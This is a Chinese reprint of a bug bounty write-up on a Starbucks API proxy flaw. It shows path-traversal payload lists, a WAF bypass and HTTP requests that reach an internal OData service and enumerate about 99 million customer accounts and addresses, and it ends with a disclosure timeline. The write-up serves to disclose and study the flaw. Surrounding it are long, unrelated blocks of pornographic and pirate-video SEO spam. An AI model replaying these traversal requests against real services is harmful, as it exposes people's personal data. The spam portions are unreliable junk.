精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

漏洞報告:“入侵”星巴克并訪問1億客戶記錄

安全 漏洞
Sam花了一整天的嘗試,仍然沒有在Verizon Media漏洞賞金計劃中有所收獲,于是,他決定先退出做一些其他事情。他上網(wǎng)準備訂購星巴克的禮品卡,作為朋友的生日禮物。

Sam花了一整天的嘗試,仍然沒有在Verizon Media漏洞賞金計劃中有所收獲,于是,他決定先退出做一些其他事情。他上網(wǎng)準備訂購星巴克的禮品卡,作為朋友的生日禮物。

[[330909]]

當sam在星巴克官網(wǎng)上試圖購買時,他發(fā)現(xiàn)了API調(diào)用的可疑之處:在以“ / bff / proxy /”為前綴的API下發(fā)送了一些請求,但這些請求返回的數(shù)據(jù)似乎來自另一臺主機。

正好,由于星巴克有一個漏洞賞金計劃,于是,繼續(xù)研究下去吧。

以下是返回sam的用戶信息的其中之一的API調(diào)用示例:

  1. POST /bff/proxy/orchestra/get-user HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "data": { 
  7.  
  8.     "user": { 
  9.  
  10.       "exId": "77EFFC83-7EE9-4ECA-9049-A6A23BF1830F", 
  11.  
  12.       "firstName": "Sam", 
  13.  
  14.       "lastName": "Curry", 
  15.  
  16.       "email": "samwcurry@gmail.com", 
  17.  
  18.       "partnerNumber": null, 
  19.  
  20.       "birthDay": null, 
  21.  
  22.       "birthMonth": null, 
  23.  
  24.       "loyaltyProgram": null 
  25.  
  26.     } 
  27.  
  28.   } 
  29.  

在上面的示例中,“ app.starbucks.com”主機將無法訪問通過特定端點訪問的數(shù)據(jù),但可以充當假設(shè)的第二個主機的代理或中間人,“internal.starbucks.com”。

這里要考慮的一些有趣的事情是……

  • 我們?nèi)绾螠y試應(yīng)用程序的路由?
  • 如果應(yīng)用程序?qū)⒄埱舐酚傻絻?nèi)部主機,則權(quán)限模型是什么樣的?
  • 我們可以控制發(fā)送到內(nèi)部主機的請求中的路徑或參數(shù)嗎?
  • 內(nèi)部主機上是否有開放重定向,如果有,應(yīng)用程序?qū)⒆裱_放重定向嗎?
  • 返回的內(nèi)容是否必須匹配適當?shù)念愋?是否解析JSON,XML或任何其他數(shù)據(jù)?)

Sam做的第一件事是嘗試遍歷API調(diào)用,以便可以加載其他路徑,而執(zhí)行此操作的方式是發(fā)送以下負載:

  1. /bff/proxy/orchestra/get-user/..%2f 
  2.  
  3. /bff/proxy/orchestra/get-user/..;/ 
  4.  
  5. /bff/proxy/orchestra/get-user/../ 
  6.  
  7. /bff/proxy/orchestra/get-user/..%00/ 
  8.  
  9. /bff/proxy/orchestra/get-user/..%0d/ 
  10.  
  11. /bff/proxy/orchestra/get-user/..%5c 
  12.  
  13. /bff/proxy/orchestra/get-user/..\ 
  14.  
  15. /bff/proxy/orchestra/get-user/..%ff/ 
  16.  
  17. /bff/proxy/orchestra/get-user/%2e%2e%2f 
  18.  
  19. /bff/proxy/orchestra/get-user/.%2e/ 
  20.  
  21. /bff/proxy/orchestra/get-user/%3f (?) 
  22.  
  23. /bff/proxy/orchestra/get-user/%26 (&) 
  24.  
  25. /bff/proxy/orchestra/get-user/%23 (#) 

可惜的是,這些都不起作用。它們都返回了我通常會看到的相同的404頁面……

在這種情況下,我們可以將“ / bff / proxy / orchestra / get-user”視為我們正在調(diào)用的未包含用戶輸入的函數(shù)。同時,我們有機會找到一個確實接受用戶輸入的函數(shù),例如“ / bff / proxy / users /:id”,在這里我們有足夠的空間測試它將接受的數(shù)據(jù)。如果我們發(fā)現(xiàn)這樣的API調(diào)用,那么嘗試遍歷有效負載并發(fā)送其他數(shù)據(jù)(實際上是在用戶輸入中接收)可能會更有幫助。

Sam仔細留意這個App,發(fā)現(xiàn)了更多的API調(diào)用。而他發(fā)現(xiàn)的接受用戶輸入的第一個信息是:

  1. GET /bff/proxy/v1/me/streamItems/:streamItemId HTTP/1.1  
  2. Host: app.starbucks.com 

這個端點不同于“get user”端點,因為最后一個路徑作為參數(shù)存在,在其中提供了任意輸入。如果將此輸入作為內(nèi)部系統(tǒng)上的路徑處理,那么完全可能遍歷它并訪問其他內(nèi)部端點。

幸運的是,sam嘗試的第一個測試返回了一個非常好的指標,表明可以遍歷端點:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Not Found", 
  11.  
  12.       "errorCode": 404, 
  13.  
  14.       ... 

這個JSON響應(yīng)與“ / bff / proxy”下所有其他常規(guī)API調(diào)用的JSON響應(yīng)相同。這表明sam正在使用內(nèi)部系統(tǒng),并且已經(jīng)成功地修改了正在與之交談的路徑。下一步將是映射內(nèi)部系統(tǒng),而做到這一點的最佳方法將是通過標識返回“ 400錯誤請求”的第一條路徑遍歷到根。

但很快,sam遇到了一個障礙。有一個WAF讓他不能深入兩個目錄:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 403 Forbidden 
  6.  
  7. 不過,這個WAF很弱…… 
  8.  
  9. GET /bff/proxy/v1/me/streamItems/web\..\.\..\ HTTP/1.1 
  10.  
  11. Host: app.starbucks.com 
  12.  
  13.  
  14.   "errors": [ 
  15.  
  16.     { 
  17.  
  18.       "message": "Not Found", 
  19.  
  20.       "errorCode": 404, 
  21.  
  22.       ... 

最終,在返回7條路徑后,sam收到了以下錯誤:

  1. GET /bff/proxy/v1/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Bad Request", 
  11.  
  12.       "errorCode": 400, 
  13.  
  14.       ... 

這意味著內(nèi)部API的根是6個返回路徑,可以使用目錄暴力破解工具或Burp Suite的入侵者和單詞列表將其映射出來。

此時,sam對這個漏洞更加感興趣了,他和Justin Gardner進行了探討。

而Justin Gardner幾乎立即在內(nèi)部系統(tǒng)的根目錄下識別出許多路徑,方法是觀察到對這些路徑的HTTP請求,之后如果沒有正斜杠,就會使用Burp的入侵者返回重定向代碼:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 301 Moved Permanently 
  6.  
  7. Server: nginx 
  8.  
  9. Content-Type: text/html 
  10.  
  11. Content-Length: 162 
  12.  
  13. Location: /search/ 

Justin致力于尋找所有端點時,sam開始逐一研究每個目錄。運行完自己的掃描后,sam發(fā)現(xiàn)“搜索”下有“v1”,而“v1”下有“賬戶”和“地址”。

于是,他給Justin發(fā)了一條消息,想想如果“ / search / v1 / accounts”端點是對所有生產(chǎn)帳戶的搜索,那將是多么有趣……

而事實,果然如此。“ / search / v1 / accounts”可以訪問所有星巴克帳戶的Microsoft Graph實例。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "ExternalId": "12345", 
  15.  
  16.       "UserName": "UserName", 
  17.  
  18.       "FirstName": "FirstName", 
  19.  
  20.       "LastName": "LastName", 
  21.  
  22.       "EmailAddress": "0640DE@example.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "1900-01-01T00:00:00Z", 
  29.  
  30.       "RegistrationSource": "iOSApp", 
  31.  
  32.       "LastUpdated": "2017-06-01T15:32:56.4925207Z" 
  33.  
  34.     }, 
  35.  
  36. ... 
  37.  
  38. lots of production accounts 

此外,“地址”端點返回了類似的信息……

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Addresses\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Addresses", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "AccountId": 1, 
  15.  
  16.       "AddressType": "3", 
  17.  
  18.       "AddressLine1": null, 
  19.  
  20.       "AddressLine2": null, 
  21.  
  22.       "AddressLine3": null, 
  23.  
  24.       "City": null, 
  25.  
  26.       "PostalCode": null, 
  27.  
  28.       "Country": null, 
  29.  
  30.       "CountrySubdivision": null, 
  31.  
  32.       "FirstName": null, 
  33.  
  34.       "LastName": null, 
  35.  
  36.       "PhoneNumber": null 
  37.  
  38.     }, 
  39.  
  40. ... 
  41.  
  42. lots of production addresses 

它是為生產(chǎn)帳戶和地址提供的服務(wù)。隨后,sam開始進一步探索該服務(wù),以使用Microsoft Graph功能進行確認。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$count=true 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "@odata.count":99356059 
  9.  

通過從Microsoft Graph URL添加“ $ count”參數(shù),可以確定該服務(wù)具有近1億條記錄。攻擊者可以通過添加“ $ skip”和“ $ count”之類的參數(shù)枚舉所有用戶帳戶來竊取此數(shù)據(jù)。

此外,要查明特定的用戶帳戶,攻擊者可以使用“ $ filter”參數(shù):

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$filter=startswith(UserName,'redacted') HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 81763022, 
  13.  
  14.       "ExternalId": "59d159e2-redacted-redacted-b037-e8cececdf354", 
  15.  
  16.       "UserName": "redacted@gmail.com", 
  17.  
  18.       "FirstName": "Justin", 
  19.  
  20.       "LastName": "Gardner", 
  21.  
  22.       "EmailAddress": "redacted@gmail.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "2018-05-19T18:52:15.0763564Z", 
  29.  
  30.       "RegistrationSource": "Android", 
  31.  
  32.       "LastUpdated": "2020-05-16T23:28:39.3426069Z" 
  33.  
  34.     } 
  35.  
  36.   ] 
  37.  

最后,sam還發(fā)現(xiàn)的其他一些端點,可能(尚未確認)使攻擊者能夠訪問和修改帳單地址、禮品卡、獎勵和優(yōu)惠等內(nèi)容。

  1. barcode, loyalty, appsettings, card, challenge, content, identifier, identity, onboarding, orderhistory, permissions, product, promotion, account, billingaddress, enrollment, location, music, offers, rewards, keyserver 

時間線

  • 5月16日報道
  • 5月17日補丁
  • 5月19日頒發(fā)賞金(4000美元)
  • 6月16日公開

參考鏈接:https://samcurry.net/hacking-starbucks/

 

責任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2015-09-20 21:02:36

2020-11-05 08:20:01

星巴克官網(wǎng)漏洞web安全

2013-05-24 09:18:47

游戲設(shè)計

2024-11-27 15:45:28

2015-08-14 13:43:43

2012-06-25 15:39:12

云計算案例

2021-03-29 15:44:21

數(shù)據(jù)管理

2012-01-10 10:36:48

云計算

2012-02-22 16:32:42

星巴克WifiUC瀏覽器

2012-03-31 10:03:41

WiFi

2019-06-25 08:28:06

區(qū)塊鏈供應(yīng)鏈沃爾瑪

2011-12-06 20:52:03

移動支付

2010-09-02 12:30:40

2017-09-25 14:47:11

支付寶微信Apple Pay

2021-11-18 11:45:54

Stripchat漏洞信息泄露

2021-04-14 14:12:20

WRECK漏洞IoT設(shè)備

2015-06-25 13:01:28

大數(shù)據(jù)星巴克海底撈

2014-01-03 15:57:39

ICT星巴克

2009-11-11 10:35:04

2010-06-12 09:48:17

點贊
收藏

51CTO技術(shù)棧公眾號

欧美精品一二三四| 91丨porny丨户外露出| 久久成年人免费电影| 日韩高清在线一区二区| caoporn视频在线| 日本一区二区成人在线| 91入口在线观看| 四虎影院在线免费播放| 女人香蕉久久**毛片精品| 一区一区三区| а天堂中文最新一区二区三区| 亚洲三级小视频| 国内精品二区| 91国产免费视频| 国产日韩免费| 欧美另类在线观看| 丰满的亚洲女人毛茸茸| 成人av婷婷| 欧美精品在线观看一区二区| av免费观看网| 美足av综合网| 中文字幕一区二区视频| 久久久久一区二区三区| 99精品国产99久久久久久97| 老司机精品视频网站| 欧美精品videosex牲欧美| 精品伦精品一区二区三区视频密桃| 国产一区二区三区亚洲| 日韩一级不卡| 久久精品国产精品| 久久av无码精品人妻系列试探| 日韩精品中文字幕一区二区| 欧美三级视频在线观看| av观看免费在线| heyzo高清中文字幕在线| 亚洲欧美国产三级| 一区二区精品免费视频| 国产高清一区在线观看| 91在线国产福利| 国产精品一区二区av| jlzzjlzzjlzz亚洲人| 六月丁香婷婷色狠狠久久| 日韩av电影手机在线观看| 欧美一级高潮片| 欧美日本中文| 欧美夫妻性视频| 日韩视频中文字幕在线观看| 久久视频精品| 色噜噜国产精品视频一区二区| 色综合99久久久无码国产精品| 一区二区美女| 亚洲视频第一页| 扒开jk护士狂揉免费| 亚洲免费专区| 亚洲图片在区色| 男人天堂av电影| 国产精品最新| 一个色综合导航| 国产成人精品视频免费| 久久久久蜜桃| 欧美美女15p| 国产一级做a爱免费视频| 国产综合网站| 91精品国产高清自在线| 午夜毛片在线观看| 视频一区在线播放| 国产一区视频在线播放| 国产口爆吞精一区二区| 国产精品一区二区三区乱码| 国产成人精品日本亚洲11| 亚洲经典一区二区三区| av电影在线观看一区| 蜜桃狠狠色伊人亚洲综合网站| 日本午夜在线| 中文字幕免费观看一区| 午夜啪啪福利视频| 超碰97免费在线| 91九色02白丝porn| 亚洲精品永久视频| 大桥未久女教师av一区二区| 精品亚洲夜色av98在线观看| 中文字幕黄色网址| 欧美一区二区| 欧美最猛性xxxxx亚洲精品| 一级片在线免费播放| 国产一区二区在线看| 国产精品一区二区av| 国产爆初菊在线观看免费视频网站| 国产精品电影院| 久久综合久久网| 久久xxx视频| 欧美大片在线观看| 成人在线视频免费播放| 日产精品一区二区| 久久人人97超碰精品888| 波多野结衣不卡| 国产.欧美.日韩| 日韩尤物视频| 国产嫩草在线视频| 欧美色窝79yyyycom| 日本50路肥熟bbw| 成人情趣视频网站| 97久久精品国产| 一级爱爱免费视频| 2017欧美狠狠色| 国产免费xxx| 蜜桃视频成人m3u8| 欧美r级电影在线观看| 久久激情五月丁香伊人| 日本二区三区视频| 99综合精品| 97在线中文字幕| av电影在线观看| 欧美日韩国产精品| 国偷自产av一区二区三区麻豆| 精品国产美女| 2019av中文字幕| 日韩一级性生活片| 成人av三级| 日韩精品一区二区在线| 大吊一区二区三区| 亚洲欧美大片| 精品国产乱码久久久久久郑州公司| 天天影视久久综合| 日本福利一区二区| 国产男女猛烈无遮挡a片漫画| 欧美激情精品久久久六区热门| 国产精品视频永久免费播放| 日色在线视频| 亚洲1区2区3区视频| 中文字幕一二三| 天天揉久久久久亚洲精品| 国产精品高潮在线| 毛片网站在线| 色呦呦国产精品| 自拍视频一区二区| 日韩亚洲国产精品| 九九九九精品九九九九| 美女日批视频在线观看| 日韩精品一区二区在线| 麻豆changesxxx国产| 国产精品2024| 草草草视频在线观看| 超碰国产精品一区二页| 久久深夜福利免费观看| 91亚洲视频在线观看| 国产精品对白交换视频| 日韩va在线观看| 99久久久久| 亚洲精品欧美极品| 羞羞电影在线观看www| 欧美一区二区三区在| 国产精品久久久精品四季影院| 国产呦萝稀缺另类资源| 激情成人开心网| 国产精品15p| 91精品国产成人| 国产午夜在线视频| 欧美日韩另类一区| 杨钰莹一级淫片aaaaaa播放| 久久精品国产99久久6 | 国产精品欧美久久久久天天影视| 国产精品你懂的| 91丝袜超薄交口足| 狠狠噜噜久久| 免费看成人午夜电影| 一二区成人影院电影网| 久久精品国产2020观看福利| 亚洲av无码片一区二区三区 | 欧美一区免费看| 中文字幕第一区综合| 女同激情久久av久久| 欧美在线不卡| 久久精品99久久| 另类中文字幕国产精品| 日韩在线观看视频免费| 亚洲av无码专区在线| 狠狠色狠色综合曰曰| 69xxx免费| 国产·精品毛片| 狠狠操精品视频| 精品视频久久久| 手机免费看av| 激情都市一区二区| 人妻少妇精品无码专区二区| 国产99亚洲| 亚洲在线视频福利| 国产欧美一区二区三区精品酒店| 中文字幕免费精品一区| 亚洲国产精品视频在线| 色网站国产精品| 国产乱国产乱老熟300| 91免费视频网| 爱情岛论坛亚洲自拍| 亚洲免费影视| 992tv快乐视频| 竹菊久久久久久久| 亚洲专区在线视频| 日韩伦理三区| 欧美激情综合色综合啪啪五月| 成人激情电影在线看| 精品国产乱码久久久久久牛牛| 在线观看黄色网| 午夜激情久久久| 欧美三级在线免费观看| 国产日韩欧美综合在线| 亚洲中文字幕一区| 国产乱子伦一区二区三区国色天香| 成人羞羞国产免费网站| 国内精品久久久久久久97牛牛| 亚洲色图自拍| 九色精品国产蝌蚪| 精品国产一区二区三区四区精华| 成人污版视频| 国产女人18毛片水18精品| 欧美成人精品一区二区男人小说| 欧美国产视频日韩| 免费在线看黄色| 影音先锋日韩有码| 欧美巨乳在线| 亚洲加勒比久久88色综合| 一级做a爱片久久毛片| 在线日韩国产精品| 国语对白永久免费| 精品日韩中文字幕| 日韩乱码在线观看| 亚洲综合区在线| 久久国产露脸精品国产| 亚洲人成在线播放网站岛国| 久久精品国产亚洲AV成人婷婷| 久久伊人蜜桃av一区二区| jlzzjizz在线播放观看| k8久久久一区二区三区| 蜜臀aⅴ国产精品久久久国产老师| 韩国v欧美v日本v亚洲v| 做a视频在线观看| 精品写真视频在线观看| 精品综合久久久久| 久久机这里只有精品| 欧美三级午夜理伦三级富婆| 日韩二区在线观看| 看欧美ab黄色大片视频免费 | 国产传媒欧美日韩成人精品大片| 国产传媒一区| 欧美黄色网视频| 精品一区在线播放| 日韩精品亚洲aⅴ在线影院| 好吊妞www.84com只有这里才有精品| 岛国av一区| 精品视频高清无人区区二区三区| 亚洲日产av中文字幕| 欧美日韩精品综合| 精品视频国产| 夜夜爽99久久国产综合精品女不卡| 青草国产精品| www.-级毛片线天内射视视| 欧美日韩国产综合网| 久久99久久99精品| 一区二区91| 欧美精品成人网| 久久66热偷产精品| 欧美体内she精高潮| 粉嫩aⅴ一区二区三区四区 | 精品在线播放| 性欧美精品一区二区三区在线播放| 欧美高清视频手机在在线| 日韩欧美视频免费在线观看| 一本久道综合久久精品| 免费看国产黄色片| 国产一区二区三区免费看| 国产51自产区| 国产三级精品在线| 青娱乐国产在线视频| 欧美日韩色婷婷| 一区二区三区黄| 欧美精品一区二区三区在线| 撸视在线观看免费视频| 久久精品久久久久久| 波多野在线观看| 国产精品永久免费观看| 91午夜精品| 日韩av在线一区二区三区| 午夜精品999| 91av俱乐部| 懂色中文一区二区在线播放| 国产高清一区二区三区四区| 亚洲欧美日韩中文播放 | 久久爱www久久做| 极品白嫩的小少妇| 亚洲国产精品传媒在线观看| 国产女人被狂躁到高潮小说| 欧美日韩在线另类| 国产色综合视频| 亚洲乱码av中文一区二区| 黄色精品免费看| 日本国产欧美一区二区三区| 久久综合给合| 日韩欧美国产二区| av成人天堂| 欧美性猛交xx| 国产欧美精品一区| 日韩欧美三级在线观看| 欧美二区三区91| 国产女人在线观看| 久久久久久久久久久网站| 久久精品国产福利| 久久精品国产精品青草色艺| 欧美区日韩区| 老司机午夜性大片| 久久久久国产成人精品亚洲午夜| 麻豆亚洲av成人无码久久精品| 欧美色网一区二区| 国内在线免费高清视频| 国内偷自视频区视频综合| 免费一级欧美片在线观看网站| 日韩一区二区电影在线观看| 久久av最新网址| 朝桐光av一区二区三区| 亚洲综合色噜噜狠狠| 国产欧美日韩综合精品一区二区三区| 亚洲欧美在线一区| 小h片在线观看| 精品欧美一区二区在线观看视频 | 国产mv免费观看入口亚洲| 久久电影在线| 日本天堂免费a| 国产美女一区二区| 顶臀精品视频www| 欧美日韩国产高清一区二区三区| 国产污视频在线| 国产成人高清激情视频在线观看 | 中日韩在线观看视频| 亚洲欧洲av一区二区| 中文在线а√天堂| 精品综合久久久| 亚洲视频大全| 37p粉嫩大胆色噜噜噜| 色哟哟精品一区| 国产在线视频网| 日本精品在线视频| 国产aⅴ精品一区二区三区久久| 久久久久久久激情| 国产亚洲欧美日韩日本| 国产亚洲欧美日韩高清| 亚洲天堂久久av| 欧美综合影院| 中文字幕av日韩精品| 国产最新精品精品你懂的| √天堂中文官网8在线| 日韩欧美在线网站| 久久香蕉av| 精品国产一区二区三| 老司机一区二区三区| 免费看黄色的视频| 欧美日韩中文另类| 亚洲丝袜精品| 国产一区福利视频| 日韩激情视频网站| 国产精品久久久免费看| 欧美大片一区二区三区| av中文字幕在线看| 欧美日韩精品免费看| 麻豆视频一区二区| 久久久无码精品亚洲国产| 亚洲激情视频在线播放| 99久久er| 国产91在线亚洲| 91在线观看地址| 亚洲视频久久久| 欧美国产亚洲精品久久久8v| 夜夜春成人影院| 成人不卡免费视频| 亚洲va中文字幕| av在线日韩国产精品| 亚洲自拍偷拍第一页| 国产日韩欧美| 99自拍视频在线| 亚洲精品色婷婷福利天堂| 啪啪av大全导航福利综合导航| 粉嫩av一区二区三区天美传媒| 久久综合久久综合亚洲| 国产又粗又长又大视频| 久久久久久久久久久国产| 日韩成人精品一区二区| 日韩精品视频一区二区| 欧美视频在线观看一区| 欧美人与禽性xxxxx杂性| 日本成人黄色免费看| 成人中文字幕电影| 在线观看免费视频一区| 性欧美xxxx| 自拍偷拍欧美专区| 受虐m奴xxx在线观看| 亚洲天堂一区二区| 水蜜桃在线免费观看| 久久久午夜精品理论片中文字幕| av中文字幕播放| 国产极品jizzhd欧美| 在线视频精品| 男人操女人的视频网站|